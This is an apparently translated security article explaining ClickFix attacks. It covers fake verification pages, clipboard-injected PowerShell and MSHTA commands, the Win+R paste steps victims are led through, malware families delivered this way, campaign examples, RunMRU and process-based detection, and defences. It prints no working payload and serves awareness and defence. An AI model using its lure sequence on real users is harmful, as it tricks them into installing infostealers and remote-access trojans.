What is a ClickFix attack and how does it work in detail?

Informatec Digital » Resources » What is a ClickFix attack and how does it work in detail?

ClickFix attacks have become one of the most fashionable social engineering tricks In the world of cybercrime: campaigns that seem harmless, with fake browser warnings or security checks, but end up causing the user to run malicious code on their computer, almost without realizing it.

Far from being a technical curiosity, ClickFix has already been seen in real campaigns in Latin America, Europe and other regions, distributing infostealers, remote access trojans (RATs) and complex loaders such as GHOSTPULSE or NetSupport RAT, and even taking advantage of TikTok videos or YouTube tutorials to reach thousands of victims.

What exactly is a ClickFix attack?

ClickFix is ​​a relatively recent social engineering technique (popularized since 2024) which is based on something very simple: convincing the user to copy and run commands on their own system to "fix" a supposed technical problem or complete a verification.

Instead of downloading a malicious program directly, the malicious website injects a script or command into the clipboard. (for example, PowerShell in Windows or MSHTA commands) and then shows step-by-step instructions for the victim to paste and run it in a console, Run box, or terminal.

This tactic exploits what many researchers call “verification fatigue”Users are accustomed to quickly clicking on buttons like "I'm human", "Fix it" or "Update now" without analyzing the message too much, which makes them very vulnerable when the screen looks like a Cloudflare verification, a Google CAPTCHA or a Google Meet or Zoom error.

The name ClickFix comes precisely from the buttons that usually appear on these lureswith texts like “Fix it”, “How to fix”, “Correct now” or “Solve issue”, which give the impression that the user is applying a quick solution, when in reality they are copying and launching a script that downloads malware.

How a ClickFix attack works step by step

Although there are many variations, almost all ClickFix attacks follow a common sequence. which combines compromised websites, malicious JavaScript scripts, and the "forced" intervention of the user to execute the code.

The first step is usually visiting a legitimate website that has been compromised or a directly malicious page., which the victim reaches from a link in a phishing email, manipulated search engine results (malicious SEO), malicious ads or even from a TikTok or YouTube video with supposed tricks to activate paid software.

That page displays a fake warning or verification that simulates a technical problem.: error loading a document, browser update failure, microphone or camera problems in Google Meet/Zoom, or a supposed anti-bot check like Cloudflare or reCAPTCHA that prevents you from continuing unless something is "fixed".

As soon as the user presses the "correct" button or checks the "I'm human" boxA JavaScript script automatically injects a malicious command into the clipboard, usually an obfuscated PowerShell or MSHTA command that will then download another piece of malware from a remote server.

The website displays a detailed guide for the victim to execute that command., For example:

• Click the “Fix it” button to “copy the solution code”.
• Press Win+R keys to open the Run window in Windows.
• Press Ctrl+V to paste what's on the clipboard (the malicious command).
• Press Enter to "fix the problem" or continue with the verification.

In more advanced variations, the trick is done with Win+X or with the browser consoleThe user is instructed to open a PowerShell terminal with administrator privileges from the quick menu (Win+X) or to use the browser console (F12 or Ctrl+Shift+I) and paste a block of JavaScript code or a "verification" function there.

After the command is executed, the rest of the infection develops in the background.The script downloads other parts from command and control (C2) servers, decompresses files, executes malicious DLLs by sideloading, and ends up installing infostealers or RATs in memory or on disk.

Why ClickFix is ​​so difficult to detect

One of the great advantages of ClickFix for attackers is that it bypasses many traditional security barriers.because the infection chain appears to start from the user themselves and not from a downloaded file or a classic exploit.

There isn't necessarily a suspicious attachment or an executable downloaded directly from the browser.This means that many email filters, download blockers, and URL reputation checks don't see anything overtly malicious in that first phase.

The command is executed from a "trusted shell" of the system, such as PowerShell, cmd.exe, or the browser console.This gives malware an appearance of legitimate activity and complicates the work of signature-based antivirus programs and some security solutions that are not very good at behavioral analysis.

Security products typically detect the threat after the payload has already been executed. or attempts to integrate into protected processes, modify critical files such as the hosts file, establish persistence, or communicate with a C2 server; that is, in a post-exploitation phase.

By then, the attacker may have gained significant access to the system.: elevating privileges, stealing credentials, moving laterally through the corporate network, or even attempting to disable antivirus and other layers of defense.

Where ClickFix is ​​seen in practice: common channels and lures

Investigations by various security laboratories have shown that ClickFix is ​​used in a huge range of campaigns, aimed at both home users and companies in critical sectors.

Attackers often rely on these channels to deploy their ClickFix lures:

• Legitimate websites compromised, in which they inject JavaScript frameworks like ClearFake to display fake update or verification notices.
• Malicious advertising (malvertising)especially banners and sponsored ads that redirect to fake software download or browser validation pages.
• Tutorials and videos on YouTube or TikTok, with alleged tricks to activate software or unlock premium features for free.
• Fake technical support forums and websites that mimic help portals, where it is "recommended" to run commands to fix system errors.

In Latin America, cases have already been documented where official and university websites were compromised.For example, the website of the School of Industrial Engineering at the Catholic University of Chile or the website of the Police Housing Fund of Peru, which ended up showing ClickFix flows to their visitors.

US security agencies have warned of campaigns targeting users searching for games, PDF readers, Web3 browsers, or messaging appsAll of this is done by exploiting everyday searches to redirect to pages that implement ClickFix.

Campaigns have also been observed that rely on supposed Google Meet, Zoom, DocuSign, Okta, Facebook, or Cloudflare pages., where a browser error or CAPTCHA verification is displayed, forcing the user to follow the sequence of copying and executing commands.

Most common malware distributed with ClickFix

ClickFix is ​​rarely the only piece of the attackIt is usually simply the initial vector that allows the deployment of a multi-stage infection chain with a wide variety of malware.

Among the most prominent families observed in recent campaigns are:

• Infostealers like Vidar, Lumma, Stealc, Danabot, Atomic Stealer or Odyssey Stealer, specializing in stealing browser credentials, cookies, autofill data, cryptocurrency wallets, VPN and FTP credentials, etc.
• RATs (remote access trojans) such as NetSupport RAT or ARECHCLIENT2 (SectopRAT)which allow attackers to control the system, execute commands, exfiltrate information, and launch subsequent phases, including ransomware.
• Advanced loaders such as GHOSTPULSE, Latrodectus, or ClearFakewhich act as glue, downloading, decrypting and loading the following pieces into memory, often with very elaborate layers of obfuscation and encryption.
• Tools for stealing financial and corporate information, which extract data from forms, email clients, messaging, and business applications.

In active campaigns during 2024 and 2025, ClickFix has been seen feeding complex chains.For example, a ClickFix decoy that launches PowerShell downloads a ZIP file containing a legitimate executable (such as Java's jp2launcher.exe) and a malicious DLL, and through sideloading ends up running NetSupport RAT on the computer.

Another common case is the use of MSHTA with obfuscated URLs to domains like iploggerco, which mimic legitimate IP shortening or registration services; from there a Base64-encoded PowerShell script is downloaded that ends up releasing Lumma Stealer stagers or similar.

Real-life case studies and featured campaigns with ClickFix

Reports from several incident response teams and security labs have identified multiple highly active campaigns that revolve around ClickFix as an entry point.

In the business sector, a notable impact has been observed in sectors such as advanced technology, financial services, manufacturing, retail and wholesale trade, public administration, professional and legal services, energy and utilities, among many others.

In a May 2025 campaign, attackers used ClickFix to deploy NetSupport RAT through fake pages that impersonated DocuSign and Okta, taking advantage of infrastructure associated with the ClearFake framework to inject JavaScript that manipulated the clipboard.

During March and April of 2025, an increase in traffic to domains controlled by the Latrodectus family was documented., which began using ClickFix as an initial access technique: a compromised portal redirected to a fake verification, the victim ran a PowerShell from Win+R and this downloaded an MSI that dropped the malicious DLL libcef.dll.

In parallel, typosquatting campaigns linked to Lumma Stealer were detected.In these attacks, victims were asked to execute MSHTA commands that pointed to domains mimicking iplogger; these commands downloaded heavily obfuscated PowerShell scripts that ended up decompressing packages with executables such as PartyContinued.exe and CAB contents (Boat.pst) to set up an AutoIt scripting engine responsible for launching the final version of Lumma.

Elastic Security Labs has also described campaigns where ClickFix serves as the initial hook for GHOSTPULSEwhich in turn loads an intermediate .NET loader and finally injects ARECHCLIENT2 into memory, bypassing mechanisms such as AMSI through hooking and advanced obfuscation.

In the end-user arena, several vendors have shown simplified examples of the ClickFix attack in which a “browser update” page or a fake CAPTCHA silently copies a script to the clipboard and then forces the user to paste it into PowerShell with administrator privileges, making it easier to connect to C2 infrastructure and download system-modifying executables.

One particularly worrying phenomenon is the arrival of ClickFix on TikTok.Videos generated even with AI promote "easy methods" to activate free paid versions of Office, Spotify Premium or editing programs, but in reality they guide users to copy and paste malicious commands that install infostealers like Vidar or Stealc.

How analysts detect ClickFix infections

Although it may seem like black magic to the user, ClickFix infections leave a technical trace. that threat hunting teams and EDRs can use to detect the incident.

In Windows environments, one of the points of analysis is the RunMRU registry key., which stores the recent commands executed from the Run window (Win+R):

HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ RunMRU

Analysts review these entries looking for suspicious patterns.: obfuscated commands, use of PowerShell or MSHTA with unusual URLs, calls to unknown domains, or references to administrative tools that the normal user does not usually use.

When attackers use the Win+X variant (quick access menu) to launch PowerShell or Command PromptThe clue is found in process telemetry: process creation events (such as ID 4688 in the Windows security log) where explorer.exe spawns powershell.exe right after pressing Win+X.

The correlation with other events, such as access to the %LocalAppData%\Microsoft\Windows\WinX\ folder or suspicious network connections after that executionThis helps to outline the typical behavior of a ClickFix infection, especially if processes like certutil.exe, mshta.exe, or rundll32.exe appear immediately afterward.

Another detection vector is clipboard abuseAdvanced URL filtering and DNS security solutions can identify JavaScript that attempts to inject malicious commands into the clipboard buffer, which serves to block the page before the user completes the sequence.

What are attackers trying to achieve with the ClickFix technique?

Behind all this social engineering lies a clear objective: to obtain economic benefits from stolen information., both from individual users and organizations.

Infostealers deployed through ClickFix are designed to collect credentials, cookies, and sensitive data. stored in browsers, email clients, corporate applications or cryptocurrency wallets, as well as internal documents and financial data.

With that material, malicious actors can carry out multiple criminal activities:

• Extorting companiesthreatening to leak confidential information about the organization or its clients.
• To commit direct financial fraud by exploiting compromised bank accounts, online payment systems, or crypto wallets.
• Impersonating the company or its employees to carry out frauds against third parties, such as the typical CEO fraud or BEC attacks.
• Selling credential and data packages on the dark web that other criminal groups will use in future attacks.
• To carry out industrial or geopolitical espionage when the target is a specific organization or a strategic sector.

In many documented campaigns, ClickFix has been just the first step towards larger attacksIncluding ransomware deployment after the theft of credentials, prolonged access to corporate networks, or use of the compromised infrastructure as a springboard to other objectives.

How can users and companies protect themselves against ClickFix?

Defending against ClickFix combines technology, best practices, and a lot of awareness.because the weak link that this technique exploits is precisely the user's behavior.

On an individual level, there are several very simple golden rules which greatly reduce the risk of falling:

• Never paste code into a console (PowerShell, cmd, terminal, browser console) just because a website asks you to.however legitimate it may seem.
• Be wary of Cloudflare verifications, CAPTCHAs, or "browser update" pages that ask for strange steps. beyond clicking on a box or a button.
• Keep your browser, operating system, and applications always up to dateInstalling patches from official sources and not from random banners or pop-ups.
• Activate two-factor authentication (2FA) on important accounts, to make life more difficult for the attackers even if they manage to steal the password.

In the corporate environment, in addition to these recommendations, companies should go a step further and address ClickFix as a specific threat within their security strategy.

Some key measures for organizations are:

• Restrict the use of command execution tools (PowerShell, cmd, MSHTA) through group policies, application control lists or EDR configurations, so that only technical profiles use them and always logging the activity.
• Implement modern antimalware and EDR solutions with behavior-based detection capabilities, able to identify suspicious execution patterns even when the user intervenes.
• Monitor network traffic and outbound connections to domains with poor reputationsespecially towards URL shortening services, newly registered domains, or unusual TLDs.
• Periodically review artifacts such as RunMRU, PowerShell logs, and security events to detect indicators of misuse of Win+R, Win+X or administrative consoles.

A fundamental pillar is the continuous and realistic training of staffA theoretical course is not enough; it is useful to carry out controlled social engineering tests that simulate ClickFix-type campaigns, CEO fraud, advanced phishing, or malvertising.

These simulations allow us to measure the level of maturity of the workforce in relation to these techniques.Adjust the awareness strategy, identify areas of greater risk, and reinforce the culture of "stop and think" before following suspicious instructions on a website or in an email.

Furthermore, it is vital that companies are prepared to respond quickly to an incident: have clear response plans, specialized teams or providers, and well-defined containment and eradication processes in place for when a possible ClickFix case or any other compromise vector is detected.

The proliferation of the ClickFix technique makes it clear that attackers have found a very effective way to turn the user into an unwitting accomplice.And they do not hesitate to combine it with sophisticated malware, dynamic C2 infrastructures and massive campaigns on social networks or search engines; understanding how it works, recognizing its signals and strengthening both the technology and the education of users makes the difference today between suffering a serious breach or cutting off the attack in time.

Related article:

How to protect yourself from Interlock and Warlock ransomware: a tactical and practical guide